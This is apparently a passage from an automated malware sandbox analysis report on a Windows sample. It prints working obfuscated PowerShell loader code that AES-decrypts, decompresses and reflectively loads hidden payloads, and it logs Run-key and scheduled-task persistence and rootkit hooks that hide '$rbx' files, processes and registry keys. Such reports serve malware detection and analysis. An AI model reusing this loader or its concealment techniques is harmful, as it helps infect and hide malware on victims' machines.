if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden \| powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));	Jump to behavior

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:gUdwtNDYXkts{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EysuTOhjuDXEDH,[Parameter(Position=1)][Type]$WayEsuPNIC)$posiItcnXQZ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+''+'e'+''+'c'+''+'t'+''+'e'+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+'g'+[Char](97)+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+'M'+''+'e'+''+[Char](109)+'o'+[Char](114)+''+'y'+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+''+'e'+''+[Char](108)+'e'+[Char](103)+''+'a'+'t'+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+'e',''+[Char](67)+''+[Char](108)+''+[Char](97)+'s'+[Char](115)+''+[Char](44)+''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+'ic'+','+'S'+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+','+''+[Char](65)+''+'n'+''+[Char](115)+'i'+[Char](67)+''+'l'+'a'+'s'+''+'s'+''+','+''+[Char](65)+''+[Char](117)+'t'+'o'+''+'C'+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$posiItcnXQZ.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+'ci'+'a'+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+',H'+[Char](105)+'d'+'e'+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$EysuTOhjuDXEDH).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');$posiItcnXQZ.DefineMethod(''+'I'+''+'n'+'v'+[Char](111)+''+[Char](107)+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+'N'+''+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+','+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+'u'+[Char](97)+'l',$WayEsuPNIC,$EysuTOhjuDXEDH).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+'n'+''+'a'+''+[Char](103)+'e'+'d'+'');Write-Output $posiItcnXQZ.CreateType();}$CXUkrbOMeMwqm=([AppDomain]::CurrentDomain.GetAssemblies()\|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'ys'+'t'+''+[Char](101)+''+'m'+'.d'+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+[Char](105)+'c'+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+'t'+[Char](46)+''+[Char](87)+''+[Char](105)+''+'n'+''+[Char](51)+''+[Char](50)+''+'.'+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden	Jump to behavior

Source: C:\Windows\System32\cmd.exe

Code function: 20_2_000002527DEE1E3C LoadLibraryA,GetProcAddress,SleepEx,

20_2_000002527DEE1E3C

Source: C:\Windows\System32\cmd.exe	Code function: 20_3_000002527DECA7DD push rcx; retf 003Fh	20_3_000002527DECA7DE
Source: C:\Windows\System32\conhost.exe	Code function: 21_3_00000286D7CFA7DD push rcx; retf 003Fh	21_3_00000286D7CFA7DE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 39_2_00007FFAAB8671C7 push ebp; retf	39_2_00007FFAAB8671C8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 39_2_00007FFAABA171BA push ecx; retf	39_2_00007FFAABA171CC
Source: C:\Windows\System32\conhost.exe	Code function: 40_3_000001D54781A7DD push rcx; retf 003Fh	40_3_000001D54781A7DE
Source: C:\Windows\System32\dllhost.exe	Code function: 41_3_000001EF0920A7DD push rcx; retf 003Fh	41_3_000001EF0920A7DE
Source: C:\Windows\System32\winlogon.exe	Code function: 42_3_000001CA7D1CA7DD push rcx; retf 003Fh	42_3_000001CA7D1CA7DE
Source: C:\Windows\System32\lsass.exe	Code function: 43_3_0000017D2DD3A7DD push rcx; retf 003Fh	43_3_0000017D2DD3A7DE
Source: C:\Windows\System32\svchost.exe	Code function: 44_3_0000022F4B93A7DD push rcx; retf 003Fh	44_3_0000022F4B93A7DE
Source: C:\Windows\System32\dwm.exe	Code function: 45_3_00000262F1CEA7DD push rcx; retf 003Fh	45_3_00000262F1CEA7DE
Source: C:\Windows\System32\dwm.exe	Code function: 45_3_00000262F1CBA7DD push rcx; retf 003Fh	45_3_00000262F1CBA7DE
Source: C:\Windows\System32\svchost.exe	Code function: 46_3_0000023942AFA7DD push rcx; retf 003Fh	46_3_0000023942AFA7DE
Source: C:\Windows\System32\svchost.exe	Code function: 47_3_000001EF056BA7DD push rcx; retf 003Fh	47_3_000001EF056BA7DE

Boot Survival

Creates an autostart registry key pointing to binary in C:\Windows

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR

Creates autostart registry keys with suspicious names

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR

Creates autostart registry keys with suspicious values (likely registry only malware)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\System32\Tasks\$rbx-9pdB1aHK

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run $rbx-XVR

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe:Zone.Identifier read attributes | delete

Hooks files or directories query functions (used to hide files and directories)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile

Hooks processes query functions (used to hide processes)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation

Hooks registry keys query functions (used to hide registry keys)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE $rbx-stager

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
